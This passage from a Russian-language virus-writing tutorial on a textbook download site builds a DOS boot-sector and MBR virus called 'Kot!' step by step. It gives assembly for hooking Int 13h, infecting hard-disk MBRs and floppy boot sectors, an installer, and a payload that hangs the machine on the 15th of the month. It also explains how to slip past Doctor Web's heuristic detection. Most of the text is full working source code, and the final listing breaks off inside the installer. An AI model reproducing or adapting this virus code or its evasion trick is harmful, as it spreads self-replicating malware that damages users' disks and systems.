Компьютерные науки - Учебники на русском языке - Скачать бесплатно
Дело в том, что в MBR жесткого диска тело вируса
располагается по смещению 0000h от начала сектора,
а в BOOT - записи дискеты это же смещение равно
0055h ( см. п. 1.11 ).При заражении того или иного
диска вирус определяет необходимое значение поля
" additor", которое потом будет записано в загру-
зочный сектор. Команда " ret far " для краткости
записана в виде машинного кода 0CBh.
Идея установки собственного стека заимствована из
настоящей MBR жесткого диска. Если оставить стек
" как есть ", то в некоторых случаях система будет
зависать при загрузке - проверено на практике !
1.7 Защита от антивирусных программ
В настоящее время существует только одна распрост-
раненная антивирусная программа, с которой следует
считаться при разработке нового вируса . Это всем
известный DOCTOR WEB. Благодаря довольно совершен-
ному алгоритму эвристического анализа, DOCTOR WEB
способен обнаружить новый вирус не только в фай-
лах, но и в загрузочных секторах гибких и жестких
дисков компьютера. В предыдущей главе мы рассмот-
рели, как можно скрыть присутствие вирусных кодов
в файлах и оперативной памяти ЭВМ. Теперь, вероят-
но, следует рассказать, как решается задача маски-
ровки загрузочного вируса.
После нескольких дней экспериментов было установ-
лено, что при поиске неизвестных загрузочных виру-
сов DOCTOR WEB пытается определить факт перехвата
прерывания INT 13h,при этом антивирус даже не про-
бует пройти встроенным отладчиком подозрительную
BOOT или MBR. Если, по мнению программы, INT 13h
было перехвачено, выдается сообщение о возможном
наличии в вашем компьютере неизвестного загрузоч-
ного вируса. Отсюда следует очевидный вывод :
- Команду, задающую адрес в таблице векторов пре-
рываний или выполняющую модификацию вектора INT
13h, следует зашифровать, и вирус найден не бу-
дет !
Однако сделать корректный шифровщик, хорошо рабо-
тающий на любом процессоре, не так просто. Поэтому
задача была решена следующим образом :
mov si,vvv - 100h ;
mov word ptr es:[si],to_new_13h ;Установим
mov word ptr es:[si + 2],cs ;вектор Int 13h
;на вирусный об-
;работчик
;
Как это ни странно, DOCTOR WEB "не догадался", что
команда
mov si,vvv - 100h
пересылает в SI число 04Ch, имеющее прямое отноше-
ние к вектору прерывания Int 13h.
Проверка приведенного метода на практике показала
его пригодность.
1.8 Перехватываем Int 13h
Согласно описанному выше алгоритму, настало время
перехватить прерывание Int 13h.Наш вирус будет ис-
пользовать его для отслеживания операций с диске-
тами. Итак :
to_read_boot equ $ - my_prg ;
;
read_boot: push cs ;DS = CS
pop ds ;
;
xor si,si ;SI = 0
mov es,si ;ES = SI
;Получим вектор
;Int 13h и сох-
;раним его :
mov bx,word ptr es:[4ch] ;
mov word ptr old_13h - 100h,bx ;
mov bx,word ptr es:[4eh] ;
mov word ptr old_13h_2 - 100h,bx ;
;
mov si,vvv - 100h ;
mov word ptr es:[si],to_new_13h ;И установим
mov word ptr es:[si + 2],cs ;вектор Int 13h
;на вирусный об-
;работчик
;
Прерывание здесь перехватывается путем непосредст-
венной модификации вектора в таблице векторов пре-
рываний. Константа " to_read_boot " задает смеще-
ние от начала вирусного кода до метки "read_boot",
с которой и начинается код,выполняющий переопреде-
ление вектора Int 13h на вирусный обработчик.До-
полнительных пояснений работа фрагмента не требу-
ет.
1.9 Читаем исходную BOOT - запись
Сначала договоримся, где наш вирус будет хранить
настоящую загрузочную запись ( BOOT - для дискет
или MBR - для жестких дисков ).
Обычно на нулевой дорожке нулевой стороны винчес-
тера используется только самый первый сектор,а ос-
тальные свободны. Поэтому было бы естественно сох-
ранить MBR в одном из секторов нулевой дорожки.Нас
заинтересовал сектор с номером 12,но можно было бы
взять и любой другой. Только не следует выбирать
сектора с очень большими номерами. Может случиться
так, что, например сектора с номером 100 на диске
просто не существует ( особенно это относится к
старым накопителям ). Оптимальный номер - не выше
двадцати.
Для дискет оригинальную BOOT - запись лучше всего
записывать в последний сектор последней дорожки на
первой стороне заражаемого диска .
Для того, чтобы с зараженного диска можно было за-
грузиться, вирус должен считать исходную загрузоч-
ную запись в память по адресу : 0000:7C00h и после
выполнения необходимых действий передать ей упра-
вление :
mov dx,num_head - 100h ;Считаем настоя-
mov cx,cyl_sect - 100h ;щий загрузочный
mov bx,7c00h ;сектор в память
mov ax,0201h ;по адресу
int 13h ;0000:7C00h
В приведенном фрагменте задействованы ячейки памя-
ти :
num_head dw 0 ;Здесь вирус
cyl_sect dw 0 ;хранит номер
;головки,дорожки
;и сектора зара-
;женного диска ,
;в которых запи-
;сана настоящая
;загрузочная
;запись .
Несколько позже мы разберемся,как определяются по-
мещаемые в них значения.
1.10 Заражаем MBR винчестера
Следуя алгоритму, настало время проверить, зараже-
на - ли MBR первого жесткого диска, и если нет -
заразить ее. Поэтому приступим к делу :
push cs ;ES = CS
pop es ;
;
mov dl,0080h ;Считаем MBR
call cs:read_mbr ;винчестера
jc cs:to_quit ;по адресу
;CS:0400h, при-
;чем загрузка
;сейчас может
;производиться
;и с дискеты !
cmp byte ptr ds:[400h],33h ;MBR уже зара-
je cs:to_quit ;жена ?
;
mov dx,0080h ;Нулевая головка
;первого жестко-
;го диска
mov cx,000ch ;Сектор 12,
;дорожка 0
mov dl_save - 100h,dl ;
;Сохраним эти
;параметры .
call cs:write_mbr_last ;Кроме того,
;перепишем нас-
;тоящую MBR в
;сектор 12
jc cs:to_quit ;нулевой дорожки
;на нулевой сто-
;роне HDD .
xor si,si ;Сформируем код
mov additor - 100h,00h ;для записи его
mov cx,prg_lenght ;
copy_vir_mbr: ;на место исход-
mov al,byte ptr ds:[si];ной MBR
mov byte ptr ds:[si + 400h],al ;
inc si ;
loop cs:copy_vir_mbr ;
;
mov dx,0080h ;Запишем этот
call cs:write_mbr ;код в первый
;сектор нулевой
;дорожки нулевой
;стороны винчес-
;тера
to_quit: mov ah,04h ;Наш
int 1ah ;вирус при
jc cs:bad_clock ;загрузке по
cmp dl,15h ;15 - м числам
vis: je cs:vis ;вешает систему
bad_clock: popf ;Восстановим из
pop es ;стека
pop ds ;регистры
pop si ;
pop dx ;
pop cx ;
pop bx ;
pop ax ;
;
db 0eah ;И отдадим упра-
dw 7c00h ;вление настоя-
dw 0000h ;щей загрузочной
;записи ( MBR )
Как вы видите, вирус достаточно свободно " чувст-
вует " себя в памяти. В самом деле - свой код он
записывает в младшие 512 байт первого " отрезанно-
го " у DOS килобайта, а MBR винчестера считывает
в младшие 512 байт второго килобайта. Так сделано
для большей понятности программы и облегчения про-
граммирования, но один килобайт памяти фактически
тратится впустую ( что с некоторой натяжкой можно
отнести к вредным действиям нашего вируса ).
Процедура " read_mbr " читает сектор 1 дорожки 0
на нулевой стороне указанного диска.
Процедура " write_mbr " записывает данные из буфе-
ра по адресу : CS:0400h в сектор 1 дорожки 0 на
нулевой стороне указанного диска.
Процедура " write_mbr_last " записывает данные из
буфера по адресу : CS:0400h в заданный сектор то-
го или иного диска и заполняет ячейки памяти :
num_head
и cyl_sect.
Для проверки зараженности MBR вирус сравнивает ее
первый байт с первым байтом своего кода - числом
33h.
Далее, в поле " additor " заносится число 00h,
необходимое для корректной загрузки с винчестера.
Стоит отметить, что заражение MBR происходит ис-
ключительно при загрузке с зараженной дискеты. Ко-
гда операционная система будет загружена,вирус бу-
дет инфицировать только гибкие диски при попытке
прочитать их содержимое.А поскольку никому не при-
дет в голову менять жесткие диски во включенной в
сеть и работающей машине, нет смысла предусматри-
вать заражение MBR в резидентном режиме. Если же
попробовать проделать вышеописанную процедуру, то
компьютер с высокой вероятностью выйдет из строя,и
вирус " погибнет " вместе с ним.
1.11 Пишем обработчик прерывания Int 13h
Наконец все подготовительные действия завершены, и
мы можем заняться разработкой вирусного обработчи-
ка прерывания Int 13h. Именно этот обработчик дол-
жен отслеживать операции с гибкими дисками и при
необходимости заражать их.
Начнем с выяснения условий, при которых вирус дол-
жен будет заразить BOOT - сектор дискеты.Пусть за-
ражение будет выполняться в том случае,если проис-
ходит чтение любого сектора нулевой дорожки нуле-
вой стороны, кроме первого.Исходя из этого, можно
записать :
;Далее следует
;вирусный обра-
;ботчик Int 13h
to_new_13h equ $ - my_prg ;
;
new_13h: pushf ;Сохраним флаги
cmp dl,01h ;Операция с дис-
;ководом " A "
;или " B " ?
ja cs:to_sys_13h ;Нет !
cmp ah,02h ;Чтение ?
jne cs:to_sys_13h ;Нет !
cmp ch,00h ;Дорожка " 0 " ?
jne cs:to_sys_13h ;Нет !
cmp cl,01h ;Сектор-первый ?
je cs:to_sys_13h ;Да !
call cs:boot_infect ;Вызовем проце-
;дуру заражения
;BOOT - секторов
;дискет
to_sys_13h: ;
popf ;Восстановим
;флаги
db 0eah ;Перейдем к сис-
old_13h dw 0 ;темному обра-
old_13h_2 dw 0 ;ботчику Int 13h
Обратите внимание, что при чтении секторов 2...N
нулевой дорожки нулевой стороны дискеты упра-
вление передается процедуре " boot_infect ", кото-
рая занимается заражением гибких дисков. Если бы
заражение происходило при чтении любого сектора,то
на зараженной машине все операции с дисководом вы-
полнялись бы раздражающе медленно.
Для передачи управления системному обработчику Int
13h используется обычная команда далекого перехо-
да, записанная в виде машинной инструкции.
Теперь разработаем процедуру " boot_infect ",зара-
жающую дискеты. Естественно сделать ее по аналогии
с фрагментом, который " работает " с винчестером .
Поэтому :
boot_infect proc ;
push ax ;Сохраним реги-
push bx ;стры в стеке
push cx ;прерванного
push dx ;процесса
push di ;
push ds ;
push es ;
pushf ;
;
push cs ;ES = CS
pop es ;
;
push cs ;DS = CS
pop ds ;
;
mov cx,3 ;Попробуем про-
next_read: push cx ;честь BOOT -
;сектор дискеты.
call cs:read_mbr ;На это даем три
pop cx ;попытки (напри-
jnc cs:inf_check ;мер,если двига-
;тель дисковода
;не успел разо-
;гнаться до ра-
;бочей скорости,
;то BIOS вернет
;ошибку -дискета
;сменена ! )
xor ah,ah ;При ошибке -
pushf ;сбросим текущий
call dword ptr old_13h - 100h ;дисковод
jc cs:to_jump ;и повторим
loop cs:next_read ;чтение
to_jump: jmp cs:restore_regs ;
;BOOT - сектор
;заражен ?
inf_check: cmp byte ptr ds:[455h],33h
je cs:to_jump ;Да !
cmp word ptr ds:[40bh],200h ;512 байт в
;секторе ?
jne cs:to_jump ;Нет !
;
mov dl_save - 100h,dl
mov ch,79 ;Определим
mov dh,byte ptr ds:[415h]
cmp dh,0f0h ;параметры
je cs:real_80 ;дискеты
cmp dh,0f9h ;по ее
je cs:real_80 ;Media
cmp dh,0fdh ;Descryptor
jne cs:to_jump ;
mov ch,39 ;
real_80: mov dh,01h ;
mov cl,byte ptr ds:[418h]
;Перепишем нас-
;тоящий BOOT в
;последний сек-
;тор последней
;дорожки на пос-
;ледней стороне
xor dl,dl ;
call cs:write_mbr_last ;
jc cs:to_jump ;
;
mov additor - 100h,055h;Сформируем код,
xor di,di ;который нужно
mov cx,prg_lenght ;записать на
copy_vir: mov al,byte ptr ds:[di];дискету вместо
mov byte ptr ds:[di + 455h],al ;исходной BOOT -
inc di ;записи
loop cs:copy_vir ;
mov word ptr ds:[400h],053ebh ;
;
xor dh,dh ;И запишем его
call cs:write_mbr ;в первый
;сектор нулевой
;дорожки нулевой
;стороны дискеты
;
restore_regs: ;Восстановим из
popf ;стека регистры
pop es ;
pop ds ;
pop di ;
pop dx ;
pop cx ;
pop bx ;
pop ax ;
ret ;Выйдем из про-
;цедуры
boot_infect endp ;
Как вы успели заметить,текст процедуры очень похож
на текст фрагмента, который будет заражать жесткий
диск. Небольшие отличия связаны со спецификой ра-
боты дисковода и винчестера. Дело в том, что жест-
кий диск вращается непрерывно (за исключением не-
которых новых систем с режимом экономии электро-
энергии), а двигатель дисковода запускается только
при закрытии его флажка (если быть точным,это за-
висит от конструкции дисковода.) Поэтому,если дви-
гатель дисковода к моменту выполнения операции
чтения не набрал необходимую скорость, BIOS вер-
нет ошибку и сообщит, что дискета сменена.В этом
случае рекомендуется повторить чтение, предварите-
льно сбросив накопитель. Наш вирус повторяет попы-
тку чтения три раза, после чего в случае неудачи
отказывается от заражения такого диска.
Несколько раньше мы выяснили, что для разных вер-
сий MS DOS и WINDOWS программа начальной загрузки
в BOOT - секторе дискеты располагается по разным
смещениям. Сделано это по той причине, что старшие
версии операционной системы хранят в загрузочном
секторе более подробные сведения о диске. Наи-
большим смещением,с которым вы когда - либо може-
те встретиться, является 0055h. Поэтому наш вирус
будет помещать в BOOT - сектор свой код,ориентиру-
ясь именно на приведенное значение. Тогда в первые
два байта сектора должна быть записана команда пе-
рехода на начало этого кода, а именно : " EB 53 ".
Формат BOOT - сектора приведен в ПРИЛОЖЕНИИ 2.
И последнее - вирус определяет параметры заражае-
мой дискеты исходя из ее Media Descryptor. Сам De-
scryptor содержится в BOOT - секторе любой дискеты
и вместе с некоторыми другими параметрами однозна-
чно задает ее тип.Интерпретация различных дескрип-
торов приведена в конце ПРИЛОЖЕНИЯ 2.
1.12 Используемые процедуры
Фактически вирус уже изготовлен.Осталось лишь при-
вести тексты процедур, которые он будет использо-
вать в своей работе :
read_mbr proc ;
xor dh,dh ;
mov ax,0201h ;Процедура
mov bx,400h ;читает первый
mov cx,01h ;сектор нулевой
pushf ;дорожки нулевой
call dword ptr old_13h - 100h ;стороны указан-
ret ;ного накопителя
read_mbr endp ;
;
write_mbr proc ;
mov ax,0301h ;Процедура
mov cx,01h ;помещает вирус-
pushf ;ный код в BOOT-
call dword ptr old_13h - 100h ;сектор дискеты
ret ;или записывает
write_mbr endp ;его вместо MBR
;винчестера
;
write_mbr_last proc ;Процедура
;переписывает
;исходную BOOT-
;запись или MBR
mov num_head - 100h,dx ;в заданный
mov cyl_sect - 100h,cx ;сектор
mov dl,dl_save - 100h ;заражаемого
;диска
mov ax,0301h ;
pushf ;
call dword ptr old_13h - 100h ;
ret ;
write_mbr_last endp ;
Процедуры построены очень просто, и объяснять их
работу, скорее всего, нет смысла. Отметим только,
что все вызовы Int 13h оформлены в виде вызова да-
льней процедуры. Это необходимо для предотвращения
потенциальных " глюков ", связанных с нереентера-
бельностью программ,выполняющих обработку Int 13h.
Хотя такой метод несколько увеличивает размер ви-
русного кода.
1.13 Область данных вируса
В отличие от предыдущих программ, область данных
написанного нами загрузочного вируса имеет на уди-
вление простую структуру :
;
db 'Kot!' ;Название вируса
dl_save db 0 ;Ячейка для вре-
;менного хране-
;ния регистра DL
;( он задает
;номер накопите-
;ля )
num_head dw 0 ;Здесь вирус
cyl_sect dw 0 ;хранит номер
;головки,дорожки
;и сектора зара-
;женного диска ,
;на которых за-
;писана настоя-
;щая загрузочная
;запись
vvv dw 004ch ;Смещение к век-
;тору Int 13h
;Длина вирусного
;кода :
prg_lenght equ $ - my_prg
Вы можете спросить,почему для имени вируса отведе-
но всего четыре байта.Дело в том,что наш вирус по-
лучился довольно большим (421 байт - можете прове-
рить !). Несколько раньше мы выяснили, что этот
размер не может быть больше, чем 425 байт. А
425 - 421 как раз равно четырем ...
1.14 Пишем секцию инсталляции
Очевидно, в таком виде, в каком сейчас существует
наш вирус, его довольно трудно внедрить в систему.
Поэтому для облегчения этой "вредительской" опе-
рации напишем специальный инсталлятор. Его функция
состоит в следующем : при старте запускающей про-
граммы из командной строки или из - под оболочки
заразить диск в дисководе " A ".Причем диск совсем
не обязательно должен быть загрузочным. Далее с
этого диска нужно загрузиться на той машине, ко-
торую требуется заразить. При этом вирус заразит
MBR ее жесткого диска. Теперь, после загрузки с
винчестера, вирус будет инфицировать все читаемые
на зараженной машине дискеты и начнет распрост-
раняться.
Исходя из сказанного выше, можно предложить такое
решение :
installer: lea si,my_prg ;Подменим коман-
mov byte ptr [si],33h ;ду перехода на
mov byte ptr [si + 1],0c0h ;первые три бай-
mov byte ptr [si + 2],8eh ;та кода вируса
;Попробуем про-
;честь BOOT -
;сектор дискеты.
mov ax,0201h ;
mov cx,01h ;
xor dx,dx ;
lea bx,bufer ;
int 13h ;
jc error ;
;
push es ;Получим пара-
mov ah,08h ;метры дискеты
xor dl,dl ;
int 13h ;
jnc all_good ;
cmp ah,01h ;
jne error ;
mov dh,01h ;
mov ch,27h ;
mov cl,byte ptr bufer [18h] ;
all_good: xor dl,dl ;
mov num_head,dx ;
mov cyl_sect,cx ;
pop es ;
;Перепишем нас-
;тоящий BOOT в
;последний сек-
;тор последней
;дорожки на пос-
;ледней стороне
mov ax,0301h ;
lea bx,bufer ;
int 13h ;
jc error ;
;Сформируем код,
;который нужно
;записать на
;дискету вместо
;исходной BOOT -
;записи
mov additor,055h ;
lea si,bufer + 55h ;
lea di,my_prg ;
mov cx,prg_lenght ;
copy_boot: mov al,byte ptr [di] ;
mov byte ptr [si],al ;
inc si ;
inc di ;
loop copy_boot ;
mov word ptr bufer[0],053ebh ;
;И запишем его
;в первый
;сектор нулевой
;дорожки нулевой
;стороны дискеты
mov ax,0301h ;
mov cx,01h ;
mov dx,0 ;
lea bx,bufer ;
int 13h ;
jnc prg_end ;
;
error: mov ah,09h ;Если была оши-
lea dx,err_mes ;бка - выведем
int 21h ;сообщение о ней
;
prg_end: mov ax,4c00h ;Завершаем за-
int 21h ;пускающую про-
;грамму
err_mes db 'Error !$' ;Сообщение
bufer db 512 dup ( 0 ) ;В этот буфер
;считывается
;BOOT - сектор
;заражаемой
;дискеты
prg ends ;
end my_prg ;
Если вирусу не удалось заразить диск, то выдается
сообщение " ERROR ! ". В этом случае попытку зара-
жения просто нужно повторить.
И еще - если вы хотите узнать, зачем понадобились
первые четыре команды инсталлятора, вам следует
посмотреть приводимый ниже полный текст вирусной
программы. Обратите внимание на первую команду, а
именно : " jmp installer ".Инсталлятор замещает ее
кодом, устанавливающим собственный стек вируса, и
поэтому в заражаемые сектора эта команда не по-
падет.
1.15 Текст загрузочного вируса
Ниже представлен текст предлагаемого загрузочного
вируса :
; _______________________________________________
;| |
;| BOOT & MBR virus |
;| Especially for my readers ! |
;|_______________________________________________|
prg segment
assume cs:prg,ds:prg,es:prg,ss:prg
org 100h
my_prg: jmp installer ;
db 0d0h ;
mov sp,7bfeh ;Установка собс-
;твенного стека
push ax ;Сохраним в сте-
push bx ;ке используемые
push cx ;регистры
push dx ;
push si ;
push ds ;
push es ;
pushf ;
;
push cs ;DS = CS
pop ds ;
;
sub word ptr ds:[0413h],2 ;"Отрежем" у DOS
mov ax,ds:[0413h] ;два килобайта
mov cl,6 ;памяти и вычис-
;лим
sal ax,cl ;сегментный ад-
;рес,по которому
;находится полу-
;ченный блок
mov es,ax ;Поместим адрес
;в ES
xor si,si ;И скопируем код
mov cx,prg_lenght ;вируса длиной
prg_copy: db 8ah ;"prg_lenght" в
db 9ch ;память по адре-
additor db 00h ;су ES : 0000h
db 7ch ;Сам код при за-
mov byte ptr es:[si],bl;грузке помещае-
inc si ;тся BIOS по ад-
loop cs:prg_copy ;ресу 0000:7C00h
;
push ax ;Запишем в стек
mov ax,to_read_boot ;адрес ES:to_re-
push ax ;ad_boot и осу-
db 0cbh ;ществим переход
;на этот адрес
to_read_boot equ $ - my_prg ;
;
read_boot: push cs ;DS = CS
pop ds ;
;
xor si,si ;SI = 0
mov es,si ;ES = SI
;Получим вектор
;Int 13h и сох-
;раним его :
mov bx,word ptr es:[4ch] ;
mov word ptr old_13h - 100h,bx ;
mov bx,word ptr es:[4eh] ;
mov word ptr old_13h_2 - 100h,bx ;
;
mov si,vvv - 100h ;
mov word ptr es:[si],to_new_13h ;И установим
mov word ptr es:[si + 2],cs ;вектор Int 13h
;на вирусный об-
;работчик
;
mov dx,num_head - 100h ;Считаем настоя-
mov cx,cyl_sect - 100h ;щий загрузочный
mov bx,7c00h ;сектор в память
mov ax,0201h ;по адресу
int 13h ;0000:7C00h
push cs ;ES = CS
pop es ;
;
mov dl,0080h ;Считаем MBR
call cs:read_mbr ;винчестера
jc cs:to_quit ;по адресу
;CS:0400h, при-
;чем загрузка
;сейчас может
;производиться
;и с дискеты !
cmp byte ptr ds:[400h],33h ;MBR уже зара-
je cs:to_quit ;жена ?
;
mov dx,0080h ;Нулевая головка
;первого жестко-
;го диска
mov cx,000ch ;Сектор 12,
;дорожка 0
mov dl_save - 100h,dl ;
;Сохраним эти
;параметры .
call cs:write_mbr_last ;Кроме того,
;перепишем нас-
;тоящую MBR в
;сектор 12
jc cs:to_quit ;нулевой дорожки
;на нулевой сто-
;роне HDD .
xor si,si ;Сформируем код
mov additor - 100h,00h ;для записи его
mov cx,prg_lenght ;
copy_vir_mbr: ;на место исход-
mov al,byte ptr ds:[si];ной MBR
mov byte ptr ds:[si + 400h],al ;
inc si ;
loop cs:copy_vir_mbr ;
;
mov dx,0080h ;Запишем этот
call cs:write_mbr ;код в первый
;сектор нулевой
;дорожки нулевой
;стороны винчес-
;тера
to_quit: mov ah,04h ;Наш
int 1ah ;вирус при
jc cs:bad_clock ;загрузке по
cmp dl,15h ;15 - м числам
vis: je cs:vis ;вешает систему
bad_clock: popf ;Восстановим из
pop es ;стека
pop ds ;регистры
pop si ;
pop dx ;
pop cx ;
pop bx ;
pop ax ;
;
db 0eah ;И отдадим упра-
dw 7c00h ;вление настоя-
dw 0000h ;щей загрузочной
;записи ( MBR )
;Далее следует
;вирусный обра-
;ботчик Int 13h
to_new_13h equ $ - my_prg ;
;
new_13h: pushf ;Сохраним флаги
cmp dl,01h ;Операция с дис-
;ководом " A "
;или " B " ?
ja cs:to_sys_13h ;Нет !
cmp ah,02h ;Чтение ?
jne cs:to_sys_13h ;Нет !
cmp ch,00h ;Дорожка " 0 " ?
jne cs:to_sys_13h ;Нет !
cmp cl,01h ;Сектор-первый ?
je cs:to_sys_13h ;Да !
call cs:boot_infect ;Вызовем проце-
;дуру заражения
;BOOT - секторов
;дискет
to_sys_13h: ;
popf ;Восстановим
;флаги
db 0eah ;Перейдем к сис-
old_13h dw 0 ;темному обра-
old_13h_2 dw 0 ;ботчику Int 13h
boot_infect proc ;
push ax ;Сохраним реги-
push bx ;стры в стеке
push cx ;прерванного
push dx ;процесса
push di ;
push ds ;
push es ;
pushf ;
;
push cs ;ES = CS
pop es ;
;
push cs ;DS = CS
pop ds ;
;
mov cx,3 ;Попробуем про-
next_read: push cx ;честь BOOT -
;сектор дискеты.
call cs:read_mbr ;На это даем три
pop cx ;попытки (напри-
jnc cs:inf_check ;мер,если двига-
;тель дисковода
;не успел разо-
;гнаться до ра-
;бочей скорости,
;то BIOS вернет
;ошибку -дискета
;сменена ! )
xor ah,ah ;При ошибке -
pushf ;сбросим текущий
call dword ptr old_13h - 100h ;дисковод
jc cs:to_jump ;и повторим
loop cs:next_read ;чтение
to_jump: jmp cs:restore_regs ;
;BOOT - сектор
;заражен ?
inf_check: cmp byte ptr ds:[455h],33h
je cs:to_jump ;Да !
cmp word ptr ds:[40bh],200h ;512 байт в
;секторе ?
jne cs:to_jump ;Нет !
;
mov dl_save - 100h,dl
mov ch,79 ;Определим
mov dh,byte ptr ds:[415h]
cmp dh,0f0h ;параметры
je cs:real_80 ;дискеты
cmp dh,0f9h ;по ее
je cs:real_80 ;Media
cmp dh,0fdh ;Descryptor
jne cs:to_jump ;
mov ch,39 ;
real_80: mov dh,01h ;
mov cl,byte ptr ds:[418h]
;Перепишем нас-
;тоящий BOOT в
;последний сек-
;тор последней
;дорожки на пос-
;ледней стороне
xor dl,dl ;
call cs:write_mbr_last ;
jc cs:to_jump ;
;
mov additor - 100h,055h;Сформируем код,
xor di,di ;который нужно
mov cx,prg_lenght ;записать на
copy_vir: mov al,byte ptr ds:[di];дискету вместо
mov byte ptr ds:[di + 455h],al ;исходной BOOT -
inc di ;записи
loop cs:copy_vir ;
mov word ptr ds:[400h],053ebh ;
;
xor dh,dh ;И запишем его
call cs:write_mbr ;в первый
;сектор нулевой
;дорожки нулевой
;стороны дискеты
;
restore_regs: ;Восстановим из
popf ;стека регистры
pop es ;
pop ds ;
pop di ;
pop dx ;
pop cx ;
pop bx ;
pop ax ;
ret ;Выйдем из про-
;цедуры
boot_infect endp ;
read_mbr proc ;
xor dh,dh ;
mov ax,0201h ;Процедура
mov bx,400h ;читает первый
mov cx,01h ;сектор нулевой
pushf ;дорожки нулевой
call dword ptr old_13h - 100h ;стороны указан-
ret ;ного накопителя
read_mbr endp ;
;
write_mbr proc ;
mov ax,0301h ;Процедура
mov cx,01h ;помещает вирус-
pushf ;ный код в BOOT-
call dword ptr old_13h - 100h ;сектор дискеты
ret ;или записывает
write_mbr endp ;его вместо MBR
;винчестера
;
write_mbr_last proc ;Процедура
;переписывает
;исходную BOOT-
;запись или MBR
mov num_head - 100h,dx ;в заданный
mov cyl_sect - 100h,cx ;сектор зара-
mov dl,dl_save - 100h ;жаемого
;диска
mov ax,0301h ;
pushf ;
call dword ptr old_13h - 100h ;
ret ;
write_mbr_last endp ;
db 'Kot!' ;Название вируса
dl_save db 0 ;Ячейка для вре-
;менного хране-
;ния регистра DL
;( Он задает
;номер
;накопителя )
num_head dw 0 ;Здесь вирус
cyl_sect dw 0 ;хранит номер
;головки,дорожки
;и сектора , в
;которых запи-
;сана настоящая
;загрузочная
;запись
;зараженного
;диска
vvv dw 004ch ;Смещение к век-
;тору Int 13h
;Длина вирусного
;кода :
prg_lenght equ $ - my_prg
installer: lea si,my_prg ;Подменим коман-
mov byte ptr [si],33h ;ду перехода на
mov byte ptr [si + 1],0c0h ;первые три бай-
mov byte ptr [si + 2],8eh ;та кода вируса
;Попробуем про-
;честь
;BOOT -
;сектор дискеты.
mov ax,0201h ;
mov cx,01h ;
xor dx,dx ;
lea bx,bufer ;
int 13h ;
jc error ;
;
push es ;Получим пара-
mov ah,08h ;метры дискеты
xor dl,dl ;
int 13h ;
jnc all_good ;
cmp ah,01h ;
jne error ;
mov dh,01h ;
mov ch,27h ;
mov cl,byte ptr bufer [18h] ;
all_good: xor dl,dl ;
mov num_head,dx ;
mov cyl_sect,cx ;
pop es ;
;Перепишем нас-
;тоящий BOOT в
;последний сек-
;тор последней
|